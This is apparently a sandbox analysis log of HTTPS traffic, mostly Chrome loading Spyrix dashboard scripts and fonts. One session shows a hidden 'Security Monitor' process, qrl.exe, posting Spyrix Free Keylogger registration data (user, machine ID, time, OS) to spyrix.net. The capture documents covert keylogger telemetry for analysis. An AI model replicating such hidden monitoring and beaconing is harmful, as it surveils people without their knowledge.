                                                                                                                                                                                                                                                          Data Ascii: import{ac as n,m as i}from"./index-004f4025.js";const d=e=>{const{t}=n;return e.includes("@")&&e.includes(".")?"":t("Please enter a valid e-mail address")};function m(e){const{t}=n;return e.length<=180?"":t("The field must contain less than 180 characters


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          48192.168.2.75505895.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC590OUTGET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC391INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:30 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 3702
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-e76"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-01T21:04:47+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc72
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC3702INData Raw: 69 6d 70 6f 72 74 20 42 20 66 72 6f 6d 22 2e 2f 6c 6f 6f 70 2d 63 34 35 66 30 66 31 65 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 64 20 61 73 20 62 2c 6d 20 61 73 20 69 2c 61 69 20 61 73 20 77 2c 63 20 61 73 20 64 2c 6f 20 61 73 20 75 2c 62 20 61 73 20 68 2c 69 20 61 73 20 66 2c 6e 20 61 73 20 6f 2c 75 20 61 73 20 61 2c 68 20 61 73 20 70 2c 55 20 61 73 20 76 2c 7a 20 61 73 20 6d 2c 65 20 61 73 20 43 2c 79 20 61 73 20 49 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 5f 20 61 73 20 45 7d 66 72 6f 6d 22 2e 2f 42 75 74 74 6f 6e 2e 76 75 65 5f 76 75 65 5f 74 79 70 65 5f 73 63 72 69 70 74 5f 73 65 74 75 70 5f 74 72 75 65 5f 6c 61 6e 67 2d 35 36 65 64 66 35 61 36 2e 6a 73 22 3b 63 6f 6e 73 74 20 57 3d 22 2d 7a 74
                                                                                                                                                                                                                                                          Data Ascii: import B from"./loop-c45f0f1e.js";import{d as b,m as i,ai as w,c as d,o as u,b as h,i as f,n as o,u as a,h as p,U as v,z as m,e as C,y as I}from"./index-004f4025.js";import{_ as E}from"./Button.vue_vue_type_script_setup_true_lang-56edf5a6.js";const W="-zt


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          49192.168.2.75505995.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC553OUTGET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:30 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 523
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-20b"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:02:54+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc69
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC523INData Raw: 69 6d 70 6f 72 74 7b 6f 20 61 73 20 65 2c 62 20 61 73 20 6f 2c 69 20 61 73 20 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 63 6f 6e 73 74 20 73 3d 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 7d 2c 6e 3d 74 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 34 2e 37 32 20 31 33 2e 34 33 34 68 2d 2e 36 37 37 6c 2d 2e 32 34 2d 2e 32 33 32 61 35 2e 35 35 20 35 2e 35 35 20 30 20 30 20 30 20 31 2e 33 34 36 2d 33 2e 36 32 37 20 35 2e 35 37 34 20 35 2e 35 37 34 20 30 20 31 20 30 2d 35 2e 35 37 34 20 35 2e 35 37 34 20 35 2e 35 35 20 35 2e 35 35 20 30 20 30 20 30 20 33 2e 36 32 37 2d 31 2e 33 34 36 6c 2e 32 33 32 2e
                                                                                                                                                                                                                                                          Data Ascii: import{o as e,b as o,i as t}from"./index-004f4025.js";const s={xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},n=t("path",{d:"M14.72 13.434h-.677l-.24-.232a5.55 5.55 0 0 0 1.346-3.627 5.574 5.574 0 1 0-5.574 5.574 5.55 5.55 0 0 0 3.627-1.346l.232.


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          50192.168.2.75506195.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC395OUTGET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC329INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:31 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 129
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-81"
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:11:49+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc30
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC129INData Raw: 63 6f 6e 73 74 20 74 3d 22 5f 36 70 74 63 2d 76 31 6f 22 2c 6f 3d 22 65 54 55 74 31 76 53 4d 22 2c 63 3d 7b 22 62 75 74 74 6f 6e 2d 74 65 6d 70 6c 61 74 65 22 3a 22 5f 36 70 74 63 2d 76 31 6f 22 2c 62 75 74 74 6f 6e 54 65 6d 70 6c 61 74 65 3a 74 2c 22 77 69 74 68 2d 69 63 6f 6e 22 3a 22 65 54 55 74 31 76 53 4d 22 2c 77 69 74 68 49 63 6f 6e 3a 6f 7d 3b 65 78 70 6f 72 74 7b 63 7d 3b 0a
                                                                                                                                                                                                                                                          Data Ascii: const t="_6ptc-v1o",o="eTUt1vSM",c={"button-template":"_6ptc-v1o",buttonTemplate:t,"with-icon":"eTUt1vSM",withIcon:o};export{c};


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          51192.168.2.75506295.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC391OUTGET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC329INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:31 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 120
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-78"
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:11:49+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc30
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC120INData Raw: 63 6f 6e 73 74 20 74 3d 22 76 61 4a 67 37 58 47 66 22 2c 6f 3d 22 6d 74 78 46 75 75 71 6f 22 2c 6e 3d 22 4d 74 41 55 6d 34 72 64 22 2c 78 3d 7b 22 62 75 74 74 6f 6e 2d 74 65 78 74 22 3a 22 76 61 4a 67 37 58 47 66 22 2c 62 75 74 74 6f 6e 54 65 78 74 3a 74 2c 74 65 78 74 3a 6f 2c 70 72 69 6d 61 72 79 3a 6e 7d 3b 65 78 70 6f 72 74 7b 78 20 61 73 20 63 7d 3b 0a
                                                                                                                                                                                                                                                          Data Ascii: const t="vaJg7XGf",o="mtxFuuqo",n="MtAUm4rd",x={"button-text":"vaJg7XGf",buttonText:t,text:o,primary:n};export{x as c};


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          52192.168.2.75506395.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC419OUTGET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:31 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 733
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-2dd"
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:02:54+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc69
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC733INData Raw: 69 6d 70 6f 72 74 7b 45 20 61 73 20 75 2c 73 20 61 73 20 6c 2c 61 74 20 61 73 20 69 2c 70 20 61 73 20 6d 2c 64 20 61 73 20 6f 2c 6f 20 61 73 20 72 2c 62 20 61 73 20 5f 2c 72 20 61 73 20 70 2c 6e 20 61 73 20 66 2c 75 20 61 73 20 63 2c 67 2c 65 20 61 73 20 64 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 63 20 61 73 20 68 7d 66 72 6f 6d 22 2e 2f 43 6f 6e 66 69 72 6d 50 68 6f 6e 65 4d 6f 64 61 6c 2e 6d 6f 64 75 6c 65 2d 33 66 33 36 39 62 33 32 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 5f 20 61 73 20 45 7d 66 72 6f 6d 22 2e 2f 54 65 78 74 2e 76 75 65 5f 76 75 65 5f 74 79 70 65 5f 73 63 72 69 70 74 5f 73 65 74 75 70 5f 74 72 75 65 5f 6c 61 6e 67 2d 61 36 36 34 35 34 32 64 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                          Data Ascii: import{E as u,s as l,at as i,p as m,d as o,o as r,b as _,r as p,n as f,u as c,g,e as d}from"./index-004f4025.js";import{c as h}from"./ConfirmPhoneModal.module-3f369b32.js";import{_ as E}from"./Text.vue_vue_type_script_setup_true_lang-a664542d.js";function


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          53192.168.2.75506495.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC386OUTGET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:31 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 1392
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-570"
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:11:49+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc30
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC1392INData Raw: 69 6d 70 6f 72 74 7b 61 75 20 61 73 20 6e 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 63 6f 6e 73 74 20 72 3d 28 65 2c 6f 2c 74 29 3d 3e 7b 73 77 69 74 63 68 28 6f 29 7b 63 61 73 65 22 69 6e 63 72 65 61 73 65 22 3a 72 65 74 75 72 6e 20 65 2e 73 6f 72 74 28 28 73 2c 61 29 3d 3e 73 5b 74 5d 3e 61 5b 74 5d 3f 31 3a 2d 31 29 3b 63 61 73 65 22 64 65 63 72 65 61 73 65 22 3a 72 65 74 75 72 6e 20 65 2e 73 6f 72 74 28 28 73 2c 61 29 3d 3e 73 5b 74 5d 3c 61 5b 74 5d 3f 31 3a 2d 31 29 7d 7d 2c 79 3d 6e 28 22 6d 6f 64 61 6c 22 2c 7b 73 74 61 74 65 3a 28 29 3d 3e 28 7b 6d 6f 64 61 6c 73 51 75 65 75 65 3a 5b 5d 7d 29 2c 67 65 74 74 65 72 73 3a 7b 69 73 41 63 74 69 76 65 41 6e 79 4d 6f 64 61 6c 28 65 29 7b 72 65 74 75 72 6e 21 21 65
                                                                                                                                                                                                                                                          Data Ascii: import{au as n}from"./index-004f4025.js";const r=(e,o,t)=>{switch(o){case"increase":return e.sort((s,a)=>s[t]>a[t]?1:-1);case"decrease":return e.sort((s,a)=>s[t]<a[t]?1:-1)}},y=n("modal",{state:()=>({modalsQueue:[]}),getters:{isActiveAnyModal(e){return!!e


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          54192.168.2.75506695.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC416OUTGET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:31 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 1185
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-4a1"
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T02:52:16+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc7
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC1185INData Raw: 69 6d 70 6f 72 74 7b 64 20 61 73 20 70 2c 6f 20 61 73 20 6e 2c 62 20 61 73 20 69 2c 72 20 61 73 20 73 2c 66 20 61 73 20 75 2c 6e 20 61 73 20 64 2c 75 20 61 73 20 6c 2c 77 20 61 73 20 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 63 20 61 73 20 61 7d 66 72 6f 6d 22 2e 2f 42 75 74 74 6f 6e 2e 6d 6f 64 75 6c 65 2d 36 64 34 65 39 31 62 38 2e 6a 73 22 3b 63 6f 6e 73 74 20 66 3d 5b 22 74 79 70 65 22 2c 22 64 69 73 61 62 6c 65 64 22 2c 22 6f 6e 43 6c 69 63 6b 22 5d 2c 6d 3d 5b 22 6f 6e 43 6c 69 63 6b 22 5d 2c 6b 3d 70 28 7b 5f 5f 6e 61 6d 65 3a 22 42 75 74 74 6f 6e 22 2c 70 72 6f 70 73 3a 7b 73 69 7a 65 3a 7b 64 65 66 61 75 6c 74 3a 22 6d 64 22 7d 2c 76 61 72 69 61 6e 74 3a 7b 64 65 66 61 75 6c 74 3a 22
                                                                                                                                                                                                                                                          Data Ascii: import{d as p,o as n,b as i,r as s,f as u,n as d,u as l,w as t}from"./index-004f4025.js";import{c as a}from"./Button.module-6d4e91b8.js";const f=["type","disabled","onClick"],m=["onClick"],k=p({__name:"Button",props:{size:{default:"md"},variant:{default:"


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          55192.168.2.755067158.69.117.1194437440C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC166OUTPOST /dashboard/prg-actions HTTP/1.1
                                                                                                                                                                                                                                                          Host: spyrix.net
                                                                                                                                                                                                                                                          User-Agent: curl/7.64.0
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Content-Length: 420
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC420OUTData Raw: 26 61 63 74 69 6f 6e 3d 61 70 70 3a 77 69 7a 61 72 64 3a 53 74 61 72 74 26 64 61 74 61 3d 26 70 72 67 5f 69 64 3d 53 70 79 72 69 78 20 46 72 65 65 20 4b 65 79 6c 6f 67 67 65 72 26 70 72 67 5f 76 65 72 3d 31 31 2e 36 2e 32 32 26 75 73 65 72 5f 6e 61 6d 65 3d 66 72 6f 6e 74 64 65 73 6b 26 75 73 65 72 3d 26 63 6f 6d 70 5f 6e 61 6d 65 3d 33 37 37 31 34 32 26 63 6f 6d 70 5f 69 64 3d 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5f 32 34 31 30 30 32 30 31 35 36 32 35 26 63 6f 6d 70 5f 74 69 6d 65 3d 32 30 32 34 2d 31 30 2d 30 32 20 30 31 3a 35 38 3a 34 37 2e 36 31 32 26 70 72 67 5f 6c 6e 67 3d 65 6e 67 6c 69 73 68 26 6f 73 5f 63 61 70 74 69 6f 6e 3d 20 28 29 26 6f 73 5f 74 79 70 65 3d 77 69 6e 64 6f
                                                                                                                                                                                                                                                          Data Ascii: &action=app:wizard:Start&data=&prg_id=Spyrix Free Keylogger&prg_ver=11.6.22&user_name=user&user=&comp_name=377142&comp_id=9e146be9-c76a-4720-bcdb-53011b87bd06_241002015625&comp_time=2024-10-02 01:58:47.612&prg_lng=english&os_caption= ()&os_type=windo
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC170INHTTP/1.1 201 Created
                                                                                                                                                                                                                                                          Server: nginx/1.17.3
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:31 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2024-10-02 04:28:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          56192.168.2.75506895.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC637OUTGET /dashboard30/assets/Nunito-Bold-765bfff4.woff2 HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                          Referer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.css
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:32 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:32 GMT
                                                                                                                                                                                                                                                          Content-Type: font/woff2
                                                                                                                                                                                                                                                          Content-Length: 43608
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-aa58"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:11:45+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc30
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
